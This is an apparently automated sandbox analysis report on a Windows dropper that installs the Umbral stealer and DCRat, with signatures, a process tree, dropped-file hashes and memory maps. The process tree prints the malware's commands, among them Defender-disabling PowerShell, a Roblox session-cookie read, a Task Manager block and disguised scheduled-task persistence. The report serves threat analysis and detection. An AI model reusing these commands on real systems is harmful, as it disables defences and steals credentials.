Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-05-2024 19:11

General

  • Target

    898A94F29EDC228CE3BD2054F3D5D6DD.exe

  • Size

    4.3MB

  • MD5

    898a94f29edc228ce3bd2054f3d5d6dd

  • SHA1

    f2b5d32ca5520f35a738ef1ccbbf5fb2160bfbc5

  • SHA256

    a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37

  • SHA512

    8a7ee18864b118bd165b9f97aad3d188cd51985180feedf5c32c2f5acd6d427f05b7e6077a9c0c405bd152a203086203aa306db802e13f917c04040c4b789eae

  • SSDEEP

    49152:ENPuAcWILneTm53Oln3Gl1iy92HEs/sFZ583oMLmUZ8hXyaSvgIsR1SB:ENP0WILeTm5+l2lb40r5837L8iVvIvQ

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Umbral payload 3 IoCs
  • Process spawned unexpected child process 21 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 21 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe
    "C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3196
    • C:\Users\Admin\AppData\Local\Temp\stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1956
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4712
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"
        3⤵
        • Views/modifies file attributes
        PID:4408
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2700
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2216
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3084
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1492
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3836
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:2968
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:3564
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:4000
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:3744
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:916
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • Runs ping.exe
              PID:2632
        • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
          "C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:4664
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3320
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:548
              • C:\MsWinsessiondllNet\driverBrokercommon.exe
                "C:\MsWinsessiondllNet\driverBrokercommon.exe"
                5⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1548
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dFjI7tVufc.bat"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4556
                  • C:\Windows\system32\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    7⤵
                      PID:740
                    • C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe
                      "C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe"
                      7⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Modifies registry class
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of WriteProcessMemory
                      PID:2020
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f7f3a5f-13d0-4896-b122-f11ad12acd3b.vbs"
                        8⤵
                          PID:2996
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bd577cd0-adcf-48e3-95fc-6ecef81cdaf1.vbs"
                          8⤵
                            PID:4048
                    • C:\Windows\SysWOW64\reg.exe
                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                      5⤵
                      • Modifies registry key
                      PID:4344
              • C:\Users\Admin\AppData\Local\Temp\Inject.exe
                "C:\Users\Admin\AppData\Local\Temp\Inject.exe"
                2⤵
                • Executes dropped EXE
                PID:4132
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3772
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3740
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3964
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2780
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2700
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:4016
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:4144
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:436
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:4208
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1580
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3212
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1004
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:1676
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2584
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:4996
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:4752
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2168
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:4416
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:4744
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:2588
            • C:\Windows\system32\schtasks.exe
              schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f
              1⤵
              • Process spawned unexpected child process
              • Creates scheduled task(s)
              PID:3616

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\MsWinsessiondllNet\driverBrokercommon.exe

              Filesize

              2.3MB

              MD5

              d84e590c3715c79dc5b92c435957d162

              SHA1

              2901580903e4b356448d9fe7bea510261e655363

              SHA256

              d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba

              SHA512

              b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

            • C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

              Filesize

              158B

              MD5

              ea70d7b0f1a8a1ff2d246efbdcfe1001

              SHA1

              252e762aee8fcc5761e17bb84aa3af8276852f5c

              SHA256

              1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31

              SHA512

              1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

            • C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

              Filesize

              218B

              MD5

              7c9bb5fda146efee5ee4a243d6e404b0

              SHA1

              c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd

              SHA256

              1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b

              SHA512

              797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

              Filesize

              2KB

              MD5

              d85ba6ff808d9e5444a4b369f5bc2730

              SHA1

              31aa9d96590fff6981b315e0b391b575e4c0804a

              SHA256

              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

              SHA512

              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              944B

              MD5

              77d622bb1a5b250869a3238b9bc1402b

              SHA1

              d47f4003c2554b9dfc4c16f22460b331886b191b

              SHA256

              f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

              SHA512

              d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              948B

              MD5

              5824a6037c081fda5d46de274b6e2799

              SHA1

              526367a09300cbde430e8fb44e41cbe7a0937aac

              SHA256

              4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

              SHA512

              a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              276798eeb29a49dc6e199768bc9c2e71

              SHA1

              5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

              SHA256

              cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

              SHA512

              0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Filesize

              1KB

              MD5

              288f76eb6350b99897bf8a40a26d7b88

              SHA1

              7f386d05202de2cf090bbda84d633a640730e090

              SHA256

              1b9a2714ecfaf4b2e7d7961d5f2537ea360ad0df46a0fa789255235b077075d1

              SHA512

              ffafc9d47140408afba98a9832433c0829ba696524c56d03f4ce67ae84d369c658d3a0b3cbfc62f8e5d83fc91f8f73fc1dd9a27f0deaefd1d07485a63face869

            • C:\Users\Admin\AppData\Local\Temp\4f7f3a5f-13d0-4896-b122-f11ad12acd3b.vbs

              Filesize

              731B

              MD5

              618a9a810ab07f4b89dac17b4d779106

              SHA1

              38000ba42ac18b44659eeddd29f143c707fabc18

              SHA256

              525376b2e27972300d6b4fe9337f74dcf1eb136fa01af29dfd80abdabb521b68

              SHA512

              beafc7bd11f38f33532819b50af7d67649937b74c565dbc28e273e02df2868bc473b12094022ebbe9c5d656c6d672c3db8892e887d663c65431bcedad9294f6a

            • C:\Users\Admin\AppData\Local\Temp\Inject.exe

              Filesize

              75KB

              MD5

              d428ddd1b0ce85a6c96765aeaf246320

              SHA1

              d100efdaab5b2ad851fe75a28d0aa95deb920926

              SHA256

              453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb

              SHA512

              3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zgzpw44y.q30.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Local\Temp\bd577cd0-adcf-48e3-95fc-6ecef81cdaf1.vbs

              Filesize

              507B

              MD5

              67bcd6c3b47d72ab5e378e01c1450c0e

              SHA1

              738cacda8b69315f2e60611b32b373031176b333

              SHA256

              41ae76ac5a06b9166919e942b253ffb6b1cdfec9a47622ac8518c7e6306df7ab

              SHA512

              57246abd561e751572fca5065bf7c1f38275e689c00b7ca0f12f384bc7e2b24808f7654788b317c028d351089eb0229943a53f98004152271ce5fa3046bfebf7

            • C:\Users\Admin\AppData\Local\Temp\dFjI7tVufc.bat

              Filesize

              220B

              MD5

              27939e6ce9f09d94c026b20380a2905b

              SHA1

              bfa71a6eb344b183b7664f7f7627df0594c6da7e

              SHA256

              219a544ce956cfd600a42229c855784f3fc2a02a0b65ac5291e314b3f43c0436

              SHA512

              a5415e947a363bc50a37b0a5a5bd7fefe39e3d09d10761ffdf749efd11fbcf9330ac0ce1c57efd769c2120cbc10429c911963a225ea08d480582fb054e8f9850

            • C:\Users\Admin\AppData\Local\Temp\stealer.exe

              Filesize

              229KB

              MD5

              8cc1e7cf94fec9bc505ce7411aa28861

              SHA1

              08703de84f3db427c368f16c873664d78bd83264

              SHA256

              cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba

              SHA512

              fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

            • C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

              Filesize

              2.6MB

              MD5

              6216b6bef94c09a40bfa263809b1ae56

              SHA1

              a928120e65199c6aaae6c991aa0466f3f8b06020

              SHA256

              eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b

              SHA512

              0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215

            • memory/1548-228-0x000000001B080000-0x000000001B08C000-memory.dmp

              Filesize

              48KB

            • memory/1548-232-0x000000001B0C0000-0x000000001B0C8000-memory.dmp

              Filesize

              32KB

            • memory/1548-234-0x000000001B0E0000-0x000000001B0EC000-memory.dmp

              Filesize

              48KB

            • memory/1548-233-0x000000001B0D0000-0x000000001B0DA000-memory.dmp

              Filesize

              40KB

            • memory/1548-231-0x000000001B0B0000-0x000000001B0BE000-memory.dmp

              Filesize

              56KB

            • memory/1548-230-0x000000001B0A0000-0x000000001B0AA000-memory.dmp

              Filesize

              40KB

            • memory/1548-229-0x000000001B090000-0x000000001B098000-memory.dmp

              Filesize

              32KB

            • memory/1548-227-0x000000001B070000-0x000000001B07C000-memory.dmp

              Filesize

              48KB

            • memory/1548-220-0x0000000000290000-0x00000000004DA000-memory.dmp

              Filesize

              2.3MB

            • memory/1548-223-0x0000000002810000-0x0000000002818000-memory.dmp

              Filesize

              32KB

            • memory/1548-222-0x00000000026E0000-0x00000000026E8000-memory.dmp

              Filesize

              32KB

            • memory/1548-224-0x0000000002820000-0x0000000002830000-memory.dmp

              Filesize

              64KB

            • memory/1548-225-0x0000000002830000-0x0000000002886000-memory.dmp

              Filesize

              344KB

            • memory/1548-226-0x0000000002880000-0x000000000288C000-memory.dmp

              Filesize

              48KB

            • memory/1956-201-0x0000025EB51D0000-0x0000025EB51DA000-memory.dmp

              Filesize

              40KB

            • memory/1956-163-0x0000025ECDB40000-0x0000025ECDBB6000-memory.dmp

              Filesize

              472KB

            • memory/1956-202-0x0000025ECDBC0000-0x0000025ECDBD2000-memory.dmp

              Filesize

              72KB

            • memory/1956-165-0x0000025EB5180000-0x0000025EB519E000-memory.dmp

              Filesize

              120KB

            • memory/1956-164-0x0000025ECDC20000-0x0000025ECDC70000-memory.dmp

              Filesize

              320KB

            • memory/1956-126-0x00007FF920780000-0x00007FF921241000-memory.dmp

              Filesize

              10.8MB

            • memory/1956-258-0x0000025ECDC70000-0x0000025ECDE19000-memory.dmp

              Filesize

              1.7MB

            • memory/1956-259-0x00007FF920780000-0x00007FF921241000-memory.dmp

              Filesize

              10.8MB

            • memory/1956-83-0x0000025EB33F0000-0x0000025EB3430000-memory.dmp

              Filesize

              256KB

            • memory/1956-62-0x00007FF920783000-0x00007FF920785000-memory.dmp

              Filesize

              8KB

            • memory/2700-143-0x000002795A960000-0x000002795A982000-memory.dmp

              Filesize

              136KB

            • memory/3196-0-0x0000000000400000-0x000000000084E000-memory.dmp

              Filesize

              4.3MB

            • memory/4132-127-0x00007FF61B710000-0x00007FF61B73A000-memory.dmp

              Filesize

              168KB